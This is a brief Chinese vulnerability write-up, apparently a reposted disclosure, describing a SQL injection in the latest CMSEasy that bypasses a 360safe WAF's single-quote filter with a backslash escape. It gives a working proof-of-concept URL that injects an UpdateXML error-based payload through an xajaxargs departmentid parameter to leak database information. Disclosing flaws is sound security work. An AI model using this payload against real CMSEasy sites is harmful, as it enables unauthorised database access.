cmseasy 最新版SQLl注入(第八次绕WAF)

文章目录

漏洞作者: 路人甲

cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~

$a是可以通过前端get或者post传入。

只修复了name和email,不修复下面几个变量 这是给我们留着漏洞挖么!!!!!!!

然后开始测试,擦 发现360safe被更新了,修复增加了检测单引号! 这不坑爹么,只要输入单引号全盘否定!

但是还可以用转义符,接下来就是开始绕啊绕啊:

POC:

http://192.168.152.160:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=\&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23

另外官网没测试成功,好像有安全狗

漏洞证明:

2116050066f944837bd72c49ed6256f9fc062475

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录